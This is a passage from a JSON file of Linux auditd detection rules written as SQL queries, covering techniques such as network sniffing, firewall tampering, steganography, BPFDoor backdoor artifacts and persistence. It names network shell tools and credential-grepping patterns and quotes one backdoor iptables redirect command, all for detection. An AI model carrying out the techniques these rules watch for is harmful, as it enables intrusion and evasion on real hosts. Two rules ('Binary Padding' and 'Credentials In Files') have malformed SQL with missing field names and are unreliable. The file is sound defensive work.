rules_linux.json

[
    {
        "title": "Audio Capture",
        "id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5",
        "description": "Detects attempts to record audio with arecord utility",
        "author": "Pawel Mazur",
        "tags": [
            "attack.collection",
            "attack.t1123"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'arecord' AND a1 = '-vv' AND a2 = '-fdat')"
        ],
        "filename": "lnx_auditd_audio_capture.yml"
    },
    {
        "title": "Network Sniffing - Linux",
        "id": "f4d3748a-65d1-4806-bd23-e25728081d01",
        "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n",
        "author": "Timur Zinniatullin, oscd.community",
        "tags": [
            "attack.credential-access",
            "attack.discovery",
            "attack.t1040"
        ],
        "falsepositives": [
            "Legitimate administrator or user uses network sniffing tool for legitimate reasons."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'tcpdump' AND a1 = '-c' AND a3 LIKE '%-i%' ESCAPE '\\') OR (type = 'execve' AND a0 = 'tshark' AND a1 = '-c' AND a3 = '-i'))"
        ],
        "filename": "lnx_auditd_network_sniffing.yml"
    },
    {
        "title": "Password Policy Discovery - Linux",
        "id": "ca94a6db-8106-4737-9ed2-3e3bb826af0a",
        "description": "Detects password policy discovery commands",
        "author": "Ömer Günal, oscd.community, Pawel Mazur",
        "tags": [
            "attack.discovery",
            "attack.t1201"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/login.defs', '/etc/pam.d/auth', '/etc/pam.d/common-account', '/etc/pam.d/common-auth', '/etc/pam.d/common-password', '/etc/pam.d/system-auth', '/etc/security/pwquality.conf')) OR (type = 'EXECVE' AND a0 = 'chage' AND a1 IN ('--list', '-l')) OR (type = 'EXECVE' AND a0 = 'passwd' AND a1 IN ('-S', '--status')))"
        ],
        "filename": "lnx_auditd_password_policy_discovery.yml"
    },
    {
        "title": "System Owner or User Discovery - Linux",
        "id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3",
        "description": "Detects the execution of host or user discovery utilities such as \"whoami\", \"hostname\", \"id\", etc.\nAdversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n",
        "author": "Timur Zinniatullin, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1033"
        ],
        "falsepositives": [
            "Admin activity"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 IN ('hostname', 'id', 'last', 'users', 'w', 'who', 'whoami'))"
        ],
        "filename": "lnx_auditd_user_discovery.yml"
    },
    {
        "title": "File or Folder Permissions Change",
        "id": "74c01ace-0152-4094-8ae2-6fd776dd43e5",
        "description": "Detects file and folder permission changes.",
        "author": "Jakob Weinzettl, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1222.002"
        ],
        "falsepositives": [
            "User interacting with files permissions (normal/daily behaviour)."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND (a0 LIKE '%chmod%' ESCAPE '\\' OR a0 LIKE '%chown%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_file_or_folder_permissions.yml"
    },
    {
        "title": "Screen Capture with Import Tool",
        "id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd",
        "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n",
        "author": "Pawel Mazur",
        "tags": [
            "attack.collection",
            "attack.t1113"
        ],
        "falsepositives": [
            "Legitimate use of screenshot utility"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'import') AND ((a1 = '-window' AND a2 = 'root' AND (a3 LIKE '%.png' ESCAPE '\\' OR a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.jpeg' ESCAPE '\\')) OR (a1 LIKE '%.png' ESCAPE '\\' OR a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.jpeg' ESCAPE '\\')))"
        ],
        "filename": "lnx_auditd_screencapture_import.yml"
    },
    {
        "title": "Steganography Unzip Hidden Information From Picture File",
        "id": "edd595d7-7895-4fa7-acb3-85a18a8772ca",
        "description": "Detects extracting of zip file from image file",
        "author": "Pawel Mazur",
        "tags": [
            "attack.defense-evasion",
            "attack.t1027.003"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'unzip' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml"
    },
    {
        "title": "Clipboard Collection with Xclip Tool - Auditd",
        "id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf",
        "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n",
        "author": "Pawel Mazur",
        "tags": [
            "attack.collection",
            "attack.t1115"
        ],
        "falsepositives": [
            "Legitimate usage of xclip tools"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-o')"
        ],
        "filename": "lnx_auditd_clipboard_collection.yml"
    },
    {
        "title": "Steganography Hide Files with Steghide",
        "id": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280",
        "description": "Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.",
        "author": "Pawel Mazur",
        "tags": [
            "attack.defense-evasion",
            "attack.t1027.003"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'embed' AND a2 IN ('-cf', '-ef') AND a4 IN ('-cf', '-ef'))"
        ],
        "filename": "lnx_auditd_steghide_embed_steganography.yml"
    },
    {
        "title": "Suspicious Commands Linux",
        "id": "1543ae20-cbdf-4ec1-8d12-7664d667a825",
        "description": "Detects relevant commands often related to malware or hacking activity",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.t1059.004"
        ],
        "falsepositives": [
            "Admin activity"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'chmod' AND a1 = '777') OR (type = 'EXECVE' AND a0 = 'chmod' AND a1 = 'u+s') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/ksh') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/sh'))"
        ],
        "filename": "lnx_auditd_susp_cmds.yml"
    },
    {
        "title": "Systemd Service Reload or Start",
        "id": "2625cc59-0634-40d0-821e-cb67382a3dd7",
        "description": "Detects a reload or a start of a service.",
        "author": "Jakob Weinzettl, oscd.community",
        "tags": [
            "attack.persistence",
            "attack.t1543.002"
        ],
        "falsepositives": [
            "Installation of legitimate service.",
            "Legitimate reconfiguration of service."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%systemctl%' ESCAPE '\\' AND (a1 LIKE '%daemon-reload%' ESCAPE '\\' OR a1 LIKE '%start%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_pers_systemd_reload.yml"
    },
    {
        "title": "Loading of Kernel Module via Insmod",
        "id": "106d7cbd-80ff-4985-b682-a7043e5acb72",
        "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n",
        "author": "Pawel Mazur",
        "tags": [
            "attack.persistence",
            "attack.privilege-escalation",
            "attack.t1547.006"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'insmod' AND exe = '/usr/bin/kmod')"
        ],
        "filename": "lnx_auditd_load_module_insmod.yml"
    },
    {
        "title": "Disable System Firewall",
        "id": "53059bc0-1472-438b-956a-7508a94a91f0",
        "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.",
        "author": "Pawel Mazur",
        "tags": [
            "attack.t1562.004",
            "attack.defense-evasion"
        ],
        "falsepositives": [
            "Admin activity"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type LIKE 'SERVICE\\_STOP' ESCAPE '\\' AND unit IN ('firewalld', 'iptables', 'ufw'))"
        ],
        "filename": "lnx_auditd_disable_system_firewall.yml"
    },
    {
        "title": "Steganography Hide Zip Information in Picture File",
        "id": "45810b50-7edc-42ca-813b-bdac02fb946b",
        "description": "Detects appending of zip file to image",
        "author": "Pawel Mazur",
        "tags": [
            "attack.defense-evasion",
            "attack.t1027.003"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'cat' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\') AND a2 LIKE '%.zip' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_hidden_zip_files_steganography.yml"
    },
    {
        "title": "Linux Network Service Scanning - Auditd",
        "id": "3761e026-f259-44e6-8826-719ed8079408",
        "description": "Detects enumeration of local or remote network services.",
        "author": "Alejandro Ortuno, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1046"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'SYSCALL' AND (exe LIKE '%/telnet' ESCAPE '\\' OR exe LIKE '%/nmap' ESCAPE '\\' OR exe LIKE '%/netcat' ESCAPE '\\' OR exe LIKE '%/nc' ESCAPE '\\' OR exe LIKE '%/ncat' ESCAPE '\\' OR exe LIKE '%/nc.openbsd' ESCAPE '\\') AND key LIKE 'network\\_connect\\_4' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_network_service_scanning.yml"
    },
    {
        "title": "Overwriting the File with Dev Zero or Null",
        "id": "37222991-11e9-4b6d-8bdf-60fbe48f753e",
        "description": "Detects overwriting (effectively wiping/deleting) of a file.",
        "author": "Jakob Weinzettl, oscd.community",
        "tags": [
            "attack.impact",
            "attack.t1485"
        ],
        "falsepositives": [
            "Appending null bytes to files.",
            "Legitimate overwrite of files."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%dd%' ESCAPE '\\' AND (a1 LIKE '%if=/dev/null%' ESCAPE '\\' OR a1 LIKE '%if=/dev/zero%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_dd_delete_file.yml"
    },
    {
        "title": "Possible Coin Miner CPU Priority Param",
        "id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed",
        "description": "Detects command line parameter very often used with coin miners",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1068"
        ],
        "falsepositives": [
            "Other tools that use a --cpu-priority flag"
        ],
        "level": "critical",
        "rule": [
            "SELECT * FROM logs WHERE (a1 LIKE '--cpu-priority%' ESCAPE '\\' OR a2 LIKE '--cpu-priority%' ESCAPE '\\' OR a3 LIKE '--cpu-priority%' ESCAPE '\\' OR a4 LIKE '--cpu-priority%' ESCAPE '\\' OR a5 LIKE '--cpu-priority%' ESCAPE '\\' OR a6 LIKE '--cpu-priority%' ESCAPE '\\' OR a7 LIKE '--cpu-priority%' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_coinminer.yml"
    },
    {
        "title": "Split A File Into Pieces - Linux",
        "id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769",
        "description": "Detection use of the command \"split\" to split files into parts and possible transfer.",
        "author": "Igor Fits, oscd.community",
        "tags": [
            "attack.exfiltration",
            "attack.t1030"
        ],
        "falsepositives": [
            "Legitimate administrative activity"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'split')"
        ],
        "filename": "lnx_auditd_split_file_into_pieces.yml"
    },
    {
        "title": "Modify System Firewall",
        "id": "323ff3f5-0013-4847-bbd4-250b5edb62cc",
        "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n",
        "author": "IAI",
        "tags": [
            "attack.t1562.004",
            "attack.defense-evasion"
        ],
        "falsepositives": [
            "Legitimate admin activity"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'iptables' AND a1 LIKE '%DROP%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'firewall-cmd' AND a1 LIKE '%remove%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'ufw' AND a1 LIKE '%delete%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_modify_system_firewall.yml"
    },
    {
        "title": "Data Compressed",
        "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee",
        "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.",
        "author": "Timur Zinniatullin, oscd.community",
        "tags": [
            "attack.exfiltration",
            "attack.t1560.001"
        ],
        "falsepositives": [
            "Legitimate use of archiving tools by legitimate user."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'zip') OR (type = 'execve' AND a0 = 'gzip' AND a1 = '-k') OR (type = 'execve' AND a0 = 'tar' AND a1 LIKE '%-c%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_data_compressed.yml"
    },
    {
        "title": "Program Executions in Suspicious Folders",
        "id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc",
        "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.t1587",
            "attack.t1584",
            "attack.resource-development"
        ],
        "falsepositives": [
            "Admin activity (especially in /tmp folders)",
            "Crazy web applications"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'SYSCALL' AND (exe LIKE '/tmp/%' ESCAPE '\\' OR exe LIKE '/var/www/%' ESCAPE '\\' OR exe LIKE '/home/%/public\\_html/%' ESCAPE '\\' OR exe LIKE '/usr/local/apache2/%' ESCAPE '\\' OR exe LIKE '/usr/local/httpd/%' ESCAPE '\\' OR exe LIKE '/var/apache/%' ESCAPE '\\' OR exe LIKE '/srv/www/%' ESCAPE '\\' OR exe LIKE '/home/httpd/html/%' ESCAPE '\\' OR exe LIKE '/srv/http/%' ESCAPE '\\' OR exe LIKE '/usr/share/nginx/html/%' ESCAPE '\\' OR exe LIKE '/var/lib/pgsql/data/%' ESCAPE '\\' OR exe LIKE '/usr/local/mysql/data/%' ESCAPE '\\' OR exe LIKE '/var/lib/mysql/%' ESCAPE '\\' OR exe LIKE '/var/vsftpd/%' ESCAPE '\\' OR exe LIKE '/etc/bind/%' ESCAPE '\\' OR exe LIKE '/var/named/%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_susp_exe_folders.yml"
    },
    {
        "title": "Bpfdoor TCP Ports Redirect",
        "id": "70b4156e-50fc-4523-aa50-c9dddf1993fc",
        "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n",
        "author": "Rafal Piasecki",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.004"
        ],
        "falsepositives": [
            "Legitimate ports redirect"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 LIKE '%iptables' ESCAPE '\\' AND a1 = '-t' AND a2 = 'nat') AND (logs MATCH ('\"--to-ports 42\" OR \"--to-ports 43\"')))"
        ],
        "filename": "lnx_auditd_bpfdoor_port_redirect.yml"
    },
    {
        "title": "Suspicious C2 Activities",
        "id": "f7158a64-6204-4d6d-868a-6e6378b467e0",
        "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n",
        "author": "Marie Euler",
        "tags": [
            "attack.command-and-control"
        ],
        "falsepositives": [
            "Admin or User activity"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE key LIKE 'susp\\_activity' ESCAPE '\\'"
        ],
        "filename": "lnx_auditd_susp_c2_commands.yml"
    },
    {
        "title": "BPFDoor Abnormal Process ID or Lock File Accessed",
        "id": "808146b2-9332-4d78-9416-d7e47012d83d",
        "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility",
        "author": "Rafal Piasecki",
        "tags": [
            "attack.execution",
            "attack.t1106",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/var/run/haldrund.pid', '/var/run/xinetd.lock', '/var/run/kdevrund.pid'))"
        ],
        "filename": "lnx_auditd_bpfdoor_file_accessed.yml"
    },
    {
        "title": "System and Hardware Information Discovery",
        "id": "1f358e2e-cb63-43c3-b575-dfb072a6814f",
        "description": "Detects system information discovery commands",
        "author": "Ömer Günal, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "informational",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/sys/class/dmi/id/bios\\_version' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/product\\_name' ESCAPE '\\' OR name LIKE '/sys/class/dmi/id/chassis\\_vendor' ESCAPE '\\' OR name LIKE '/proc/scsi/scsi' ESCAPE '\\' OR name LIKE '/proc/ide/hd0/model' ESCAPE '\\' OR name LIKE '/proc/version' ESCAPE '\\' OR name LIKE '/etc/%version' ESCAPE '\\' OR name LIKE '/etc/%release' ESCAPE '\\' OR name LIKE '/etc/issue' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_system_info_discovery2.yml"
    },
    {
        "title": "Hidden Files and Directories",
        "id": "d08722cd-3d09-449a-80b4-83ea2d9d4616",
        "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character",
        "author": "Pawel Mazur",
        "tags": [
            "attack.defense-evasion",
            "attack.t1564.001"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 IN ('mkdir', 'touch', 'vim', 'nano', 'vi')) AND (a1 LIKE '%/.%' ESCAPE '\\' OR a1 LIKE '.%' ESCAPE '\\' OR a2 LIKE '%/.%' ESCAPE '\\' OR a2 LIKE '.%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_hidden_files_directories.yml"
    },
    {
        "title": "Binary Padding - Linux",
        "id": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba",
        "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n",
        "author": "Igor Fits, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1027.001"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND (( = 'truncate' AND  = '-s') OR (( = 'dd' AND  = 'if=') AND NOT (logs MATCH ('\"of=\"')))))"
        ],
        "filename": "lnx_auditd_binary_padding.yml"
    },
    {
        "title": "Credentials In Files - Linux",
        "id": "df3fcaea-2715-4214-99c5-0056ea59eb35",
        "description": "Detecting attempts to extract passwords with grep",
        "author": "Igor Fits, oscd.community",
        "tags": [
            "attack.credential-access",
            "attack.t1552.001"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND  = 'grep' AND  = 'password')"
        ],
        "filename": "lnx_auditd_find_cred_in_files.yml"
    },
    {
        "title": "Screen Capture with Xwd",
        "id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c",
        "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations",
        "author": "Pawel Mazur",
        "tags": [
            "attack.collection",
            "attack.t1113"
        ],
        "falsepositives": [
            "Legitimate use of screenshot utility"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'xwd') AND ((a1 = '-root' AND a2 = '-out' AND a3 LIKE '%.xwd' ESCAPE '\\') OR (a1 = '-out' AND a2 LIKE '%.xwd' ESCAPE '\\')))"
        ],
        "filename": "lnx_auditd_screencaputre_xwd.yml"
    },
    {
        "title": "Systemd Service Creation",
        "id": "1bac86ba-41aa-4f62-9d6b-405eac99b485",
        "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.",
        "author": "Pawel Mazur",
        "tags": [
            "attack.persistence",
            "attack.t1543.002"
        ],
        "falsepositives": [
            "Admin work like legit service installs."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'PATH' AND nametype = 'CREATE') AND ((name LIKE '/usr/lib/systemd/system/%' ESCAPE '\\' OR name LIKE '/etc/systemd/system/%' ESCAPE '\\') OR name LIKE '%/.config/systemd/user/%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_systemd_service_creation.yml"
    },
    {
        "title": "Masquerading as Linux Crond Process",
        "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0",
        "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n",
        "author": "Timur Zinniatullin, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1036.003"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'execve' AND a0 = 'cp' AND a1 = '/bin/sh' AND a2 LIKE '%/crond' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_masquerading_crond.yml"
    },
    {
        "title": "Auditing Configuration Changes on Linux Host",
        "id": "977ef627-4539-4875-adf4-ed8f780c4922",
        "description": "Detect changes in auditd configuration files",
        "author": "Mikhail Larin, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.006"
        ],
        "falsepositives": [
            "Legitimate administrative activity"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/audit/%' ESCAPE '\\' OR name LIKE '/etc/libaudit.conf' ESCAPE '\\' OR name LIKE '/etc/audisp/%' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_auditing_config_change.yml"
    },
    {
        "title": "Logging Configuration Changes on Linux Host",
        "id": "c830f15d-6f6e-430f-8074-6f73d6807841",
        "description": "Detect changes of syslog daemons configuration files",
        "author": "Mikhail Larin, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.006"
        ],
        "falsepositives": [
            "Legitimate administrative activity"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/etc/syslog.conf', '/etc/rsyslog.conf', '/etc/syslog-ng/syslog-ng.conf'))"
        ],
        "filename": "lnx_auditd_logging_config_change.yml"
    },
    {
        "title": "Modification of ld.so.preload",
        "id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751",
        "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.",
        "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1574.006"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'PATH' AND name = '/etc/ld.so.preload')"
        ],
        "filename": "lnx_auditd_ld_so_preload_mod.yml"
    },
    {
        "title": "Linux Keylogging with Pam.d",
        "id": "49aae26c-450e-448b-911d-b3c13d178dfc",
        "description": "Detect attempt to enable auditing of TTY input",
        "author": "Pawel Mazur",
        "tags": [
            "attack.credential-access",
            "attack.t1003",
            "attack.t1056.001"
        ],
        "falsepositives": [
            "Administrative work"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/system-auth', '/etc/pam.d/password-auth')) OR (type LIKE 'TTY' ESCAPE '\\' OR type LIKE 'USER\\_TTY' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_keylogging_with_pam_d.yml"
    },
    {
        "title": "Unix Shell Configuration Modification",
        "id": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d",
        "description": "Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.",
        "author": "Peter Matkovski, IAI",
        "tags": [
            "attack.persistence",
            "attack.t1546.004"
        ],
        "falsepositives": [
            "Admin or User activity are expected to generate some false positives"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/shells' ESCAPE '\\' OR name LIKE '/etc/profile' ESCAPE '\\' OR name LIKE '/etc/profile.d/%' ESCAPE '\\' OR name LIKE '/etc/bash.bashrc' ESCAPE '\\' OR name LIKE '/etc/bashrc' ESCAPE '\\' OR name LIKE '/etc/zsh/zprofile' ESCAPE '\\' OR name LIKE '/etc/zsh/zshrc' ESCAPE '\\' OR name LIKE '/etc/zsh/zlogin' ESCAPE '\\' OR name LIKE '/etc/zsh/zlogout' ESCAPE '\\' OR name LIKE '/etc/csh.cshrc' ESCAPE '\\' OR name LIKE '/etc/csh.login' ESCAPE '\\' OR name LIKE '/root/.bashrc' ESCAPE '\\' OR name LIKE '/root/.bash\\_profile' ESCAPE '\\' OR name LIKE '/root/.profile' ESCAPE '\\' OR name LIKE '/root/.zshrc' ESCAPE '\\' OR name LIKE '/root/.zprofile' ESCAPE '\\' OR name LIKE '/home/%/.bashrc' ESCAPE '\\' OR name LIKE '/home/%/.zshrc' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_profile' ESCAPE '\\' OR name LIKE '/home/%/.zprofile' ESCAPE '\\' OR name LIKE '/home/%/.profile' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_login' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_logout' ESCAPE '\\' OR name LIKE '/home/%/.zlogin' ESCAPE '\\' OR name LIKE '/home/%/.zlogout' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_unix_shell_configuration_modification.yml"
    },
    {
        "title": "Linux Capabilities Discovery",
        "id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe",
        "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.",
        "author": "Pawel Mazur",
        "tags": [
            "attack.collection",
            "attack.privilege-escalation",
            "attack.t1123",
            "attack.t1548"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'getcap' AND a1 = '-r' AND a2 = '/')"
        ],
        "filename": "lnx_auditd_capabilities_discovery.yml"
    },
    {
        "title": "Use Of Hidden Paths Or Files",
        "id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e",
        "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.",
        "author": "David Burkett, @signalblur",
        "tags": [
            "attack.defense-evasion",
            "attack.t1574.001"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'PATH' AND name LIKE '%/.%' ESCAPE '\\') AND NOT ((name LIKE '%/.cache/%' ESCAPE '\\' OR name LIKE '%/.config/%' ESCAPE '\\' OR name LIKE '%/.pyenv/%' ESCAPE '\\' OR name LIKE '%/.rustup/toolchains%' ESCAPE '\\')))"
        ],
        "filename": "lnx_auditd_hidden_binary_execution.yml"
    },
    {
        "title": "Remove Immutable File Attribute - Auditd",
        "id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7",
        "description": "Detects removing immutable file attribute.",
        "author": "Jakob Weinzettl, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1222.002"
        ],
        "falsepositives": [
            "Administrator interacting with immutable files (e.g. for instance backups)."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%chattr%' ESCAPE '\\' AND a1 LIKE '%-i%' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_chattr_immutable_removal.yml"
    },
    {
        "title": "System Information Discovery - Auditd",
        "id": "f34047d9-20d3-4e8b-8672-0a35cc50dc71",
        "description": "Detects System Information Discovery commands",
        "author": "Pawel Mazur",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "falsepositives": [
            "Likely"
        ],
        "level": "low",
